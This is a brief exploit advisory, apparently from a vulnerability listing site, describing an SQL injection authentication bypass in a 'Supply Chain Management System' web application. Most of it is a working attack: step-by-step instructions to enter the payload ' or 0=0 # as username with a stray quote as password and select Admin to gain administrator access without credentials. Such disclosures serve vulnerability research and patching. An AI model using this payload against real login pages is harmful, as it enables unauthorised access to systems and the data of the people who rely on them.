Supply Chain Management System SQL Injection

Supply Chain Management System suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | d7d6b405c12bcf353faaedb48b2bb9bf

# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage:
# Software Link:
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4

#Vulnerable Page: Login Page

Open the Application
check the URL: http://localhost/scm-master/

Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin

click on login
The SQL payload gets executed and authentication is bypassed successfully

Related Posts